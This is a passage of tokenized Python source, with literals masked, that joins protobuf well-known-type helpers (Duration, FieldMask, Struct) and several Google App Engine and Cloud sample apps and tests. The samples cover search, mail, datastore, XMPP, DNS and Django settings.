find ( '<STR_LIT:.>' ) <EOL> if pos == - <NUM_LIT:1> : <EOL> self . seconds = int ( value [ : - <NUM_LIT:1> ] ) <EOL> self . nanos = <NUM_LIT:0> <EOL> else : <EOL> self . seconds = int ( value [ : pos ] ) <EOL> if value [ <NUM_LIT:0> ] == '<STR_LIT:->' : <EOL> self . nanos = int ( round ( float ( '<STR_LIT>' . format ( value [ pos : - <NUM_LIT:1> ] ) ) * <NUM_LIT> ) ) <EOL> else : <EOL> self . nanos = int ( round ( float ( '<STR_LIT>' . format ( value [ pos : - <NUM_LIT:1> ] ) ) * <NUM_LIT> ) ) <EOL> except ValueError : <EOL> raise ParseError ( <EOL> '<STR_LIT>' . format ( value ) ) <EOL> def ToNanoseconds ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . seconds * _NANOS_PER_SECOND + self . nanos <EOL> def ToMicroseconds ( self ) : <EOL> """<STR_LIT>""" <EOL> micros = _RoundTowardZero ( self . nanos , _NANOS_PER_MICROSECOND ) <EOL> return self . seconds * _MICROS_PER_SECOND + micros <EOL> def ToMilliseconds ( self ) : <EOL> """<STR_LIT>""" <EOL> millis = _RoundTowardZero ( self . nanos , _NANOS_PER_MILLISECOND ) <EOL> return self . seconds * _MILLIS_PER_SECOND + millis <EOL> def ToSeconds ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . seconds <EOL> def FromNanoseconds ( self , nanos ) : <EOL> """<STR_LIT>""" <EOL> self . _NormalizeDuration ( nanos // _NANOS_PER_SECOND , <EOL> nanos % _NANOS_PER_SECOND ) <EOL> def FromMicroseconds ( self , micros ) : <EOL> """<STR_LIT>""" <EOL> self . _NormalizeDuration ( <EOL> micros // _MICROS_PER_SECOND , <EOL> ( micros % _MICROS_PER_SECOND ) * _NANOS_PER_MICROSECOND ) <EOL> def FromMilliseconds ( self , millis ) : <EOL> """<STR_LIT>""" <EOL> self . _NormalizeDuration ( <EOL> millis // _MILLIS_PER_SECOND , <EOL> ( millis % _MILLIS_PER_SECOND ) * _NANOS_PER_MILLISECOND ) <EOL> def FromSeconds ( self , seconds ) : <EOL> """<STR_LIT>""" <EOL> self . seconds = seconds <EOL> self . nanos = <NUM_LIT:0> <EOL> def ToTimedelta ( self ) : <EOL> """<STR_LIT>""" <EOL> return timedelta ( <EOL> seconds = self . 
seconds , microseconds = _RoundTowardZero ( <EOL> self . nanos , _NANOS_PER_MICROSECOND ) ) <EOL> def FromTimedelta ( self , td ) : <EOL> """<STR_LIT>""" <EOL> self . _NormalizeDuration ( td . seconds + td . days * _SECONDS_PER_DAY , <EOL> td . microseconds * _NANOS_PER_MICROSECOND ) <EOL> def _NormalizeDuration ( self , seconds , nanos ) : <EOL> """<STR_LIT>""" <EOL> if seconds < <NUM_LIT:0> and nanos > <NUM_LIT:0> : <EOL> seconds += <NUM_LIT:1> <EOL> nanos -= _NANOS_PER_SECOND <EOL> self . seconds = seconds <EOL> self . nanos = nanos <EOL> def _RoundTowardZero ( value , divider ) : <EOL> """<STR_LIT>""" <EOL> result = value // divider <EOL> remainder = value % divider <EOL> if result < <NUM_LIT:0> and remainder > <NUM_LIT:0> : <EOL> return result + <NUM_LIT:1> <EOL> else : <EOL> return result <EOL> class FieldMask ( object ) : <EOL> """<STR_LIT>""" <EOL> def ToJsonString ( self ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT:U+002C>' . join ( self . paths ) <EOL> def FromJsonString ( self , value ) : <EOL> """<STR_LIT>""" <EOL> self . Clear ( ) <EOL> for path in value . split ( '<STR_LIT:U+002C>' ) : <EOL> self . paths . append ( path ) <EOL> def IsValidForDescriptor ( self , message_descriptor ) : <EOL> """<STR_LIT>""" <EOL> for path in self . paths : <EOL> if not _IsValidPath ( message_descriptor , path ) : <EOL> return False <EOL> return True <EOL> def AllFieldsFromDescriptor ( self , message_descriptor ) : <EOL> """<STR_LIT>""" <EOL> self . Clear ( ) <EOL> for field in message_descriptor . fields : <EOL> self . paths . append ( field . name ) <EOL> def CanonicalFormFromMask ( self , mask ) : <EOL> """<STR_LIT>""" <EOL> tree = _FieldMaskTree ( mask ) <EOL> tree . ToFieldMask ( self ) <EOL> def Union ( self , mask1 , mask2 ) : <EOL> """<STR_LIT>""" <EOL> _CheckFieldMaskMessage ( mask1 ) <EOL> _CheckFieldMaskMessage ( mask2 ) <EOL> tree = _FieldMaskTree ( mask1 ) <EOL> tree . MergeFromFieldMask ( mask2 ) <EOL> tree . 
ToFieldMask ( self ) <EOL> def Intersect ( self , mask1 , mask2 ) : <EOL> """<STR_LIT>""" <EOL> _CheckFieldMaskMessage ( mask1 ) <EOL> _CheckFieldMaskMessage ( mask2 ) <EOL> tree = _FieldMaskTree ( mask1 ) <EOL> intersection = _FieldMaskTree ( ) <EOL> for path in mask2 . paths : <EOL> tree . IntersectPath ( path , intersection ) <EOL> intersection . ToFieldMask ( self ) <EOL> def MergeMessage ( <EOL> self , source , destination , <EOL> replace_message_field = False , replace_repeated_field = False ) : <EOL> """<STR_LIT>""" <EOL> tree = _FieldMaskTree ( self ) <EOL> tree . MergeMessage ( <EOL> source , destination , replace_message_field , replace_repeated_field ) <EOL> def _IsValidPath ( message_descriptor , path ) : <EOL> """<STR_LIT>""" <EOL> parts = path . split ( '<STR_LIT:.>' ) <EOL> last = parts . pop ( ) <EOL> for name in parts : <EOL> field = message_descriptor . fields_by_name [ name ] <EOL> if ( field is None or <EOL> field . label == FieldDescriptor . LABEL_REPEATED or <EOL> field . type != FieldDescriptor . TYPE_MESSAGE ) : <EOL> return False <EOL> message_descriptor = field . message_type <EOL> return last in message_descriptor . fields_by_name <EOL> def _CheckFieldMaskMessage ( message ) : <EOL> """<STR_LIT>""" <EOL> message_descriptor = message . DESCRIPTOR <EOL> if ( message_descriptor . name != '<STR_LIT>' or <EOL> message_descriptor . file . name != '<STR_LIT>' ) : <EOL> raise ValueError ( '<STR_LIT>' . format ( <EOL> message_descriptor . full_name ) ) <EOL> class _FieldMaskTree ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , field_mask = None ) : <EOL> """<STR_LIT>""" <EOL> self . _root = { } <EOL> if field_mask : <EOL> self . MergeFromFieldMask ( field_mask ) <EOL> def MergeFromFieldMask ( self , field_mask ) : <EOL> """<STR_LIT>""" <EOL> for path in field_mask . paths : <EOL> self . AddPath ( path ) <EOL> def AddPath ( self , path ) : <EOL> """<STR_LIT>""" <EOL> node = self . _root <EOL> for name in path . 
split ( '<STR_LIT:.>' ) : <EOL> if name not in node : <EOL> node [ name ] = { } <EOL> elif not node [ name ] : <EOL> return <EOL> node = node [ name ] <EOL> node . clear ( ) <EOL> def ToFieldMask ( self , field_mask ) : <EOL> """<STR_LIT>""" <EOL> field_mask . Clear ( ) <EOL> _AddFieldPaths ( self . _root , '<STR_LIT>' , field_mask ) <EOL> def IntersectPath ( self , path , intersection ) : <EOL> """<STR_LIT>""" <EOL> node = self . _root <EOL> for name in path . split ( '<STR_LIT:.>' ) : <EOL> if name not in node : <EOL> return <EOL> elif not node [ name ] : <EOL> intersection . AddPath ( path ) <EOL> return <EOL> node = node [ name ] <EOL> intersection . AddLeafNodes ( path , node ) <EOL> def AddLeafNodes ( self , prefix , node ) : <EOL> """<STR_LIT>""" <EOL> if not node : <EOL> self . AddPath ( prefix ) <EOL> for name in node : <EOL> child_path = prefix + '<STR_LIT:.>' + name <EOL> self . AddLeafNodes ( child_path , node [ name ] ) <EOL> def MergeMessage ( <EOL> self , source , destination , <EOL> replace_message , replace_repeated ) : <EOL> """<STR_LIT>""" <EOL> _MergeMessage ( <EOL> self . _root , source , destination , replace_message , replace_repeated ) <EOL> def _StrConvert ( value ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( value , str ) : <EOL> return value . encode ( '<STR_LIT:utf-8>' ) <EOL> return value <EOL> def _MergeMessage ( <EOL> node , source , destination , replace_message , replace_repeated ) : <EOL> """<STR_LIT>""" <EOL> source_descriptor = source . DESCRIPTOR <EOL> for name in node : <EOL> child = node [ name ] <EOL> field = source_descriptor . fields_by_name [ name ] <EOL> if field is None : <EOL> raise ValueError ( '<STR_LIT>' . format ( <EOL> name , source_descriptor . full_name ) ) <EOL> if child : <EOL> if ( field . label == FieldDescriptor . LABEL_REPEATED or <EOL> field . cpp_type != FieldDescriptor . CPPTYPE_MESSAGE ) : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' . format ( <EOL> name , source_descriptor . 
full_name ) ) <EOL> _MergeMessage ( <EOL> child , getattr ( source , name ) , getattr ( destination , name ) , <EOL> replace_message , replace_repeated ) <EOL> continue <EOL> if field . label == FieldDescriptor . LABEL_REPEATED : <EOL> if replace_repeated : <EOL> destination . ClearField ( _StrConvert ( name ) ) <EOL> repeated_source = getattr ( source , name ) <EOL> repeated_destination = getattr ( destination , name ) <EOL> if field . cpp_type == FieldDescriptor . CPPTYPE_MESSAGE : <EOL> for item in repeated_source : <EOL> repeated_destination . add ( ) . MergeFrom ( item ) <EOL> else : <EOL> repeated_destination . extend ( repeated_source ) <EOL> else : <EOL> if field . cpp_type == FieldDescriptor . CPPTYPE_MESSAGE : <EOL> if replace_message : <EOL> destination . ClearField ( _StrConvert ( name ) ) <EOL> if source . HasField ( name ) : <EOL> getattr ( destination , name ) . MergeFrom ( getattr ( source , name ) ) <EOL> else : <EOL> setattr ( destination , name , getattr ( source , name ) ) <EOL> def _AddFieldPaths ( node , prefix , field_mask ) : <EOL> """<STR_LIT>""" <EOL> if not node : <EOL> field_mask . paths . append ( prefix ) <EOL> return <EOL> for name in sorted ( node ) : <EOL> if prefix : <EOL> child_path = prefix + '<STR_LIT:.>' + name <EOL> else : <EOL> child_path = name <EOL> _AddFieldPaths ( node [ name ] , child_path , field_mask ) <EOL> _INT_OR_FLOAT = six . integer_types + ( float , ) <EOL> def _SetStructValue ( struct_value , value ) : <EOL> if value is None : <EOL> struct_value . null_value = <NUM_LIT:0> <EOL> elif isinstance ( value , bool ) : <EOL> struct_value . bool_value = value <EOL> elif isinstance ( value , six . string_types ) : <EOL> struct_value . string_value = value <EOL> elif isinstance ( value , _INT_OR_FLOAT ) : <EOL> struct_value . number_value = value <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> def _GetStructValue ( struct_value ) : <EOL> which = struct_value . 
WhichOneof ( '<STR_LIT>' ) <EOL> if which == '<STR_LIT>' : <EOL> return struct_value . struct_value <EOL> elif which == '<STR_LIT>' : <EOL> return None <EOL> elif which == '<STR_LIT>' : <EOL> return struct_value . number_value <EOL> elif which == '<STR_LIT>' : <EOL> return struct_value . string_value <EOL> elif which == '<STR_LIT>' : <EOL> return struct_value . bool_value <EOL> elif which == '<STR_LIT>' : <EOL> return struct_value . list_value <EOL> elif which is None : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> class Struct ( object ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = [ ] <EOL> def __getitem__ ( self , key ) : <EOL> return _GetStructValue ( self . fields [ key ] ) <EOL> def __setitem__ ( self , key , value ) : <EOL> _SetStructValue ( self . fields [ key ] , value ) <EOL> def get_or_create_list ( self , key ) : <EOL> """<STR_LIT>""" <EOL> return self . fields [ key ] . list_value <EOL> def get_or_create_struct ( self , key ) : <EOL> """<STR_LIT>""" <EOL> return self . fields [ key ] . struct_value <EOL> class ListValue ( object ) : <EOL> """<STR_LIT>""" <EOL> def __len__ ( self ) : <EOL> return len ( self . values ) <EOL> def append ( self , value ) : <EOL> _SetStructValue ( self . values . add ( ) , value ) <EOL> def extend ( self , elem_seq ) : <EOL> for value in elem_seq : <EOL> self . append ( value ) <EOL> def __getitem__ ( self , index ) : <EOL> """<STR_LIT>""" <EOL> return _GetStructValue ( self . values . __getitem__ ( index ) ) <EOL> def __setitem__ ( self , index , value ) : <EOL> _SetStructValue ( self . values . __getitem__ ( index ) , value ) <EOL> def items ( self ) : <EOL> for i in range ( len ( self ) ) : <EOL> yield self [ i ] <EOL> def add_struct ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . values . add ( ) . struct_value <EOL> def add_list ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . values . add ( ) . 
list_value <EOL> WKTBASES = { <EOL> '<STR_LIT>' : Any , <EOL> '<STR_LIT>' : Duration , <EOL> '<STR_LIT>' : FieldMask , <EOL> '<STR_LIT>' : ListValue , <EOL> '<STR_LIT>' : Struct , <EOL> '<STR_LIT>' : Timestamp , <EOL> } </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import sys <EOL> sys . stderr . write ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if not hasattr ( sys , '<STR_LIT>' ) : <EOL> sys . stderr . write ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> version_tuple = tuple ( sys . version_info [ : <NUM_LIT:2> ] ) <EOL> if version_tuple < ( <NUM_LIT:2> , <NUM_LIT:4> ) : <EOL> sys . stderr . write ( '<STR_LIT>' <EOL> '<STR_LIT>' % version_tuple ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> if version_tuple == ( <NUM_LIT:2> , <NUM_LIT:4> ) : <EOL> sys . stderr . write ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> BULKLOAD_CLIENT_PATH = '<STR_LIT>' <EOL> DIR_PATH = os . path . abspath ( os . path . dirname ( <EOL> os . path . dirname ( os . path . realpath ( __file__ ) ) ) ) <EOL> EXTRA_PATHS = [ <EOL> DIR_PATH , <EOL> os . path . join ( DIR_PATH , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> os . path . join ( DIR_PATH , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> os . path . join ( DIR_PATH , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> sys . path = EXTRA_PATHS + sys . path <EOL> script_path = os . path . join ( DIR_PATH , BULKLOAD_CLIENT_PATH ) <EOL> execfile ( script_path , globals ( ) ) </s>
<s> from google . appengine . api import search <EOL> import pytest <EOL> @ pytest . fixture <EOL> def index ( ) : <EOL> index = search . Index ( name = '<STR_LIT>' , namespace = '<STR_LIT>' ) <EOL> doc = search . Document ( <EOL> doc_id = '<STR_LIT>' , <EOL> fields = [ <EOL> search . TextField ( <EOL> name = '<STR_LIT:body>' , <EOL> value = '<STR_LIT>' ) , <EOL> ] ) <EOL> index . put ( doc ) <EOL> return index <EOL> def test_basic_search ( index ) : <EOL> resp = index . search ( '<STR_LIT:hello>' ) <EOL> assert len ( resp . results ) == <NUM_LIT:1> <EOL> result = resp . results [ <NUM_LIT:0> ] <EOL> assert result . doc_id == '<STR_LIT>' <EOL> assert result . language == '<STR_LIT>' <EOL> assert result . fields [ <NUM_LIT:0> ] . value == '<STR_LIT>' <EOL> assert result . fields [ <NUM_LIT:0> ] . name == '<STR_LIT:body>' </s>
<s> import main <EOL> def test_shelves ( testbed ) : <EOL> api = main . Shelves ( ) <EOL> response = api . list ( main . Request ( ) ) <EOL> assert response <EOL> def test_books ( testbed ) : <EOL> api = main . Books ( ) <EOL> response = api . bookmark ( main . Request ( ) ) <EOL> assert response </s>
<s> from google . appengine . api import app_identity <EOL> from google . appengine . api import mail <EOL> import webapp2 <EOL> def send_approved_mail ( sender_address ) : <EOL> mail . send_mail ( sender = sender_address , <EOL> to = "<STR_LIT>" , <EOL> subject = "<STR_LIT>" , <EOL> body = """<STR_LIT>""" ) <EOL> class SendMailHandler ( webapp2 . RequestHandler ) : <EOL> def get ( self ) : <EOL> send_approved_mail ( '<STR_LIT>' . format ( <EOL> app_identity . get_application_id ( ) ) ) <EOL> self . response . content_type = '<STR_LIT>' <EOL> self . response . write ( '<STR_LIT>' ) <EOL> app = webapp2 . WSGIApplication ( [ <EOL> ( '<STR_LIT>' , SendMailHandler ) , <EOL> ] , debug = True ) </s>
<s> import datastore <EOL> import webtest <EOL> def test_datastore ( testbed ) : <EOL> app = webtest . TestApp ( datastore . app ) <EOL> response = app . get ( '<STR_LIT>' ) <EOL> assert response . status_int == <NUM_LIT:200> <EOL> assert '<STR_LIT>' in response . body <EOL> response = app . get ( '<STR_LIT>' ) <EOL> assert response . status_int == <NUM_LIT:200> <EOL> assert '<STR_LIT>' in response . body <EOL> assert '<STR_LIT>' in response . body <EOL> response = app . get ( '<STR_LIT>' ) <EOL> assert response . status_int == <NUM_LIT:200> <EOL> assert '<STR_LIT>' in response . body <EOL> assert '<STR_LIT>' in response . body </s>
<s> import cgi <EOL> from google . appengine . datastore . datastore_query import Cursor <EOL> from google . appengine . ext import ndb <EOL> import webapp2 <EOL> class Greeting ( ndb . Model ) : <EOL> """<STR_LIT>""" <EOL> content = ndb . StringProperty ( ) <EOL> date = ndb . DateTimeProperty ( auto_now_add = True ) <EOL> @ classmethod <EOL> def query_book ( cls , ancestor_key ) : <EOL> return cls . query ( ancestor = ancestor_key ) . order ( - cls . date ) <EOL> class MainPage ( webapp2 . RequestHandler ) : <EOL> GREETINGS_PER_PAGE = <NUM_LIT:20> <EOL> def get ( self ) : <EOL> guestbook_name = self . request . get ( '<STR_LIT>' ) <EOL> ancestor_key = ndb . Key ( '<STR_LIT>' , guestbook_name or '<STR_LIT>' ) <EOL> greetings = Greeting . query_book ( ancestor_key ) . fetch ( <EOL> self . GREETINGS_PER_PAGE ) <EOL> self . response . out . write ( '<STR_LIT>' ) <EOL> for greeting in greetings : <EOL> self . response . out . write ( <EOL> '<STR_LIT>' % cgi . escape ( greeting . content ) ) <EOL> self . response . out . write ( '<STR_LIT>' ) <EOL> class List ( webapp2 . RequestHandler ) : <EOL> GREETINGS_PER_PAGE = <NUM_LIT:10> <EOL> def get ( self ) : <EOL> """<STR_LIT>""" <EOL> cursor = Cursor ( urlsafe = self . request . get ( '<STR_LIT>' ) ) <EOL> greets , next_cursor , more = Greeting . query ( ) . fetch_page ( <EOL> self . GREETINGS_PER_PAGE , start_cursor = cursor ) <EOL> self . response . out . write ( '<STR_LIT>' ) <EOL> for greeting in greets : <EOL> self . response . out . write ( <EOL> '<STR_LIT>' % cgi . escape ( greeting . content ) ) <EOL> if more and next_cursor : <EOL> self . response . out . write ( '<STR_LIT>' % <EOL> next_cursor . urlsafe ( ) ) <EOL> self . response . out . write ( '<STR_LIT>' ) <EOL> app = webapp2 . WSGIApplication ( [ <EOL> ( '<STR_LIT:/>' , MainPage ) , <EOL> ( '<STR_LIT>' , List ) , <EOL> ] , debug = True ) </s>
<s> import logging <EOL> from google . appengine . api import xmpp <EOL> import mock <EOL> import webapp2 <EOL> roster = mock . Mock ( ) <EOL> class SubscribeHandler ( webapp2 . RequestHandler ) : <EOL> def post ( self ) : <EOL> sender = self . request . get ( '<STR_LIT>' ) . split ( '<STR_LIT:/>' ) [ <NUM_LIT:0> ] <EOL> roster . add_contact ( sender ) <EOL> class PresenceHandler ( webapp2 . RequestHandler ) : <EOL> def post ( self ) : <EOL> sender = self . request . get ( '<STR_LIT>' ) . split ( '<STR_LIT:/>' ) [ <NUM_LIT:0> ] <EOL> xmpp . send_presence ( sender , status = self . request . get ( '<STR_LIT:status>' ) , <EOL> presence_show = self . request . get ( '<STR_LIT>' ) ) <EOL> class SendPresenceHandler ( webapp2 . RequestHandler ) : <EOL> def post ( self ) : <EOL> jid = self . request . get ( '<STR_LIT>' ) <EOL> xmpp . send_presence ( jid , status = "<STR_LIT>" ) <EOL> class ErrorHandler ( webapp2 . RequestHandler ) : <EOL> def post ( self ) : <EOL> error_sender = self . request . get ( '<STR_LIT>' ) <EOL> error_stanza = self . request . get ( '<STR_LIT>' ) <EOL> logging . error ( '<STR_LIT>' <EOL> . format ( error_sender , error_stanza ) ) <EOL> class SendChatHandler ( webapp2 . RequestHandler ) : <EOL> def post ( self ) : <EOL> user_address = '<STR_LIT>' <EOL> msg = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> status_code = xmpp . send_message ( user_address , msg ) <EOL> chat_message_sent = ( status_code == xmpp . NO_ERROR ) <EOL> if not chat_message_sent : <EOL> pass <EOL> class XMPPHandler ( webapp2 . RequestHandler ) : <EOL> def post ( self ) : <EOL> message = xmpp . Message ( self . request . POST ) <EOL> if message . body [ <NUM_LIT:0> : <NUM_LIT:5> ] . lower ( ) == '<STR_LIT:hello>' : <EOL> message . reply ( "<STR_LIT>" ) <EOL> app = webapp2 . 
WSGIApplication ( [ <EOL> ( '<STR_LIT>' , XMPPHandler ) , <EOL> ( '<STR_LIT>' , SubscribeHandler ) , <EOL> ( '<STR_LIT>' , PresenceHandler ) , <EOL> ( '<STR_LIT>' , ErrorHandler ) , <EOL> ( '<STR_LIT>' , SendPresenceHandler ) , <EOL> ( '<STR_LIT>' , SendChatHandler ) , <EOL> ] ) </s>
<s> """<STR_LIT>""" <EOL> import argparse <EOL> import requests <EOL> METADATA_URL = '<STR_LIT>' <EOL> METADATA_HEADERS = { '<STR_LIT>' : '<STR_LIT>' } <EOL> SERVICE_ACCOUNT = '<STR_LIT:default>' <EOL> def get_access_token ( ) : <EOL> url = '<STR_LIT>' . format ( <EOL> METADATA_URL , SERVICE_ACCOUNT ) <EOL> r = requests . get ( url , headers = METADATA_HEADERS ) <EOL> r . raise_for_status ( ) <EOL> access_token = r . json ( ) [ '<STR_LIT>' ] <EOL> return access_token <EOL> def list_buckets ( project_id , access_token ) : <EOL> url = '<STR_LIT>' <EOL> params = { <EOL> '<STR_LIT>' : project_id <EOL> } <EOL> headers = { <EOL> '<STR_LIT>' : '<STR_LIT>' . format ( access_token ) <EOL> } <EOL> r = requests . get ( url , params = params , headers = headers ) <EOL> r . raise_for_status ( ) <EOL> return r . json ( ) <EOL> def main ( project_id ) : <EOL> access_token = get_access_token ( ) <EOL> buckets = list_buckets ( project_id , access_token ) <EOL> print ( buckets ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> parser = argparse . ArgumentParser ( <EOL> description = __doc__ , <EOL> formatter_class = argparse . RawDescriptionHelpFormatter ) <EOL> parser . add_argument ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> args = parser . parse_args ( ) <EOL> main ( args . project_id ) </s>
<s> from gcloud import dns <EOL> from gcp . testing . flaky import flaky <EOL> import main <EOL> import pytest <EOL> TEST_ZONE_NAME = '<STR_LIT>' <EOL> TEST_ZONE_DNS_NAME = '<STR_LIT>' <EOL> TEST_ZONE_DESCRIPTION = '<STR_LIT>' <EOL> @ pytest . yield_fixture <EOL> def client ( cloud_config ) : <EOL> client = dns . Client ( cloud_config . project ) <EOL> yield client <EOL> for zone in client . list_zones ( ) [ <NUM_LIT:0> ] : <EOL> zone . delete ( ) <EOL> @ pytest . yield_fixture <EOL> def zone ( client , cloud_config ) : <EOL> zone = client . zone ( TEST_ZONE_NAME , TEST_ZONE_DNS_NAME ) <EOL> zone . description = TEST_ZONE_DESCRIPTION <EOL> zone . create ( ) <EOL> yield zone <EOL> if zone . exists ( ) : <EOL> zone . delete ( ) <EOL> @ flaky <EOL> def test_create_zone ( client , cloud_config ) : <EOL> zone = main . create_zone ( <EOL> cloud_config . project , <EOL> TEST_ZONE_NAME , <EOL> TEST_ZONE_DNS_NAME , <EOL> TEST_ZONE_DESCRIPTION ) <EOL> assert zone . name == TEST_ZONE_NAME <EOL> assert zone . dns_name == TEST_ZONE_DNS_NAME <EOL> assert zone . description == TEST_ZONE_DESCRIPTION <EOL> @ flaky <EOL> def test_get_zone ( client , cloud_config , zone ) : <EOL> zone = main . get_zone ( cloud_config . project , TEST_ZONE_NAME ) <EOL> assert zone . name == TEST_ZONE_NAME <EOL> assert zone . dns_name == TEST_ZONE_DNS_NAME <EOL> assert zone . description == TEST_ZONE_DESCRIPTION <EOL> @ flaky <EOL> def test_list_zones ( client , cloud_config , zone ) : <EOL> zones = main . list_zones ( cloud_config . project ) <EOL> assert TEST_ZONE_NAME in zones <EOL> @ flaky <EOL> def test_delete_zone ( client , cloud_config , zone ) : <EOL> main . delete_zone ( cloud_config . project , TEST_ZONE_NAME ) <EOL> @ flaky <EOL> def test_list_resource_records ( client , cloud_config , zone ) : <EOL> records = main . list_resource_records ( cloud_config . 
project , TEST_ZONE_NAME ) <EOL> assert records <EOL> @ flaky <EOL> def test_list_changes ( client , cloud_config , zone ) : <EOL> changes = main . list_changes ( cloud_config . project , TEST_ZONE_NAME ) <EOL> assert changes </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> BASE_DIR = os . path . dirname ( os . path . dirname ( os . path . abspath ( __file__ ) ) ) <EOL> SECRET_KEY = '<STR_LIT>' <EOL> DEBUG = True <EOL> ALLOWED_HOSTS = [ ] <EOL> INSTALLED_APPS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ) <EOL> MIDDLEWARE_CLASSES = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> ROOT_URLCONF = '<STR_LIT>' <EOL> TEMPLATES = [ <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> } , <EOL> } , <EOL> ] <EOL> WSGI_APPLICATION = '<STR_LIT>' <EOL> DATABASES = { <EOL> '<STR_LIT:default>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : os . path . join ( BASE_DIR , '<STR_LIT>' ) , <EOL> } <EOL> } <EOL> LANGUAGE_CODE = '<STR_LIT>' <EOL> TIME_ZONE = '<STR_LIT>' <EOL> USE_I18N = True <EOL> USE_L10N = True <EOL> USE_TZ = True <EOL> STATIC_URL = '<STR_LIT>' </s>
<s> import re <EOL> from speech_rest import main <EOL> def test_main ( resource , capsys ) : <EOL> main ( resource ( '<STR_LIT>' ) ) <EOL> out , err = capsys . readouterr ( ) <EOL> assert re . search ( r'<STR_LIT>' , out , re . DOTALL | re . I ) </s>
<s> """<STR_LIT>""" <EOL> import argparse <EOL> import unittest <EOL> import mock <EOL> import gce_cluster <EOL> from gce_cluster import GceCluster <EOL> class GceClusterTest ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def tearDown ( self ) : <EOL> mock . patch . stopall ( ) <EOL> def _SetUpMocksForClusterStart ( self ) : <EOL> """<STR_LIT>""" <EOL> mock_gce_api_class = mock . patch ( '<STR_LIT>' ) . start ( ) <EOL> mock_subprocess_call = mock . patch ( '<STR_LIT>' , return_value = <NUM_LIT:0> ) . start ( ) <EOL> mock_popen = mock . patch ( '<STR_LIT>' ) . start ( ) <EOL> mock_popen . return_value . returncode = None <EOL> mock_popen . return_value . poll . return_value = <NUM_LIT:0> <EOL> mock_builtin_open = mock . patch ( '<STR_LIT>' ) . start ( ) <EOL> mock_sleep = mock . patch ( '<STR_LIT>' ) . start ( ) <EOL> parent_mock = mock . MagicMock ( ) <EOL> parent_mock . attach_mock ( mock_gce_api_class , '<STR_LIT>' ) <EOL> parent_mock . attach_mock ( <EOL> mock_gce_api_class . return_value . CreateInstance , <EOL> '<STR_LIT>' ) <EOL> parent_mock . attach_mock ( <EOL> mock_gce_api_class . return_value . GetInstance , <EOL> '<STR_LIT>' ) <EOL> parent_mock . attach_mock ( <EOL> mock_gce_api_class . return_value . CreateDisk , <EOL> '<STR_LIT>' ) <EOL> parent_mock . attach_mock ( <EOL> mock_gce_api_class . return_value . GetDisk , <EOL> '<STR_LIT>' ) <EOL> parent_mock . attach_mock ( mock_subprocess_call , '<STR_LIT>' ) <EOL> parent_mock . attach_mock ( mock_popen , '<STR_LIT>' ) <EOL> parent_mock . attach_mock ( mock_popen . return_value . poll , '<STR_LIT>' ) <EOL> parent_mock . attach_mock ( mock_builtin_open , '<STR_LIT>' ) <EOL> parent_mock . attach_mock ( mock_sleep , '<STR_LIT>' ) <EOL> mock_gce_api_class . return_value . GetInstance . return_value = { <EOL> '<STR_LIT:status>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ { <EOL> '<STR_LIT>' : [ { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } ] , <EOL> } ] , <EOL> } <EOL> mock_gce_api_class . return_value . 
GetDisk . side_effect = [ <EOL> None , <EOL> { '<STR_LIT:status>' : '<STR_LIT>' } , <EOL> None , <EOL> { '<STR_LIT:status>' : '<STR_LIT>' } , <EOL> None , <EOL> { '<STR_LIT:status>' : '<STR_LIT>' } , <EOL> None , <EOL> { '<STR_LIT:status>' : '<STR_LIT>' } , <EOL> None , <EOL> { '<STR_LIT:status>' : '<STR_LIT>' } , <EOL> None , <EOL> { '<STR_LIT:status>' : '<STR_LIT>' } , <EOL> ] <EOL> return parent_mock <EOL> def testEnvironmentSetUp_Success ( self ) : <EOL> """<STR_LIT>""" <EOL> with mock . patch ( '<STR_LIT>' , return_value = <NUM_LIT:0> ) as mock_subprocess_call : <EOL> GceCluster ( <EOL> argparse . Namespace ( project = '<STR_LIT>' , <EOL> bucket = '<STR_LIT>' ) ) . EnvironmentSetUp ( ) <EOL> mock_subprocess_call . assert_called_once_with ( mock . ANY , shell = True ) <EOL> self . assertRegexpMatches ( <EOL> mock_subprocess_call . call_args [ <NUM_LIT:0> ] [ 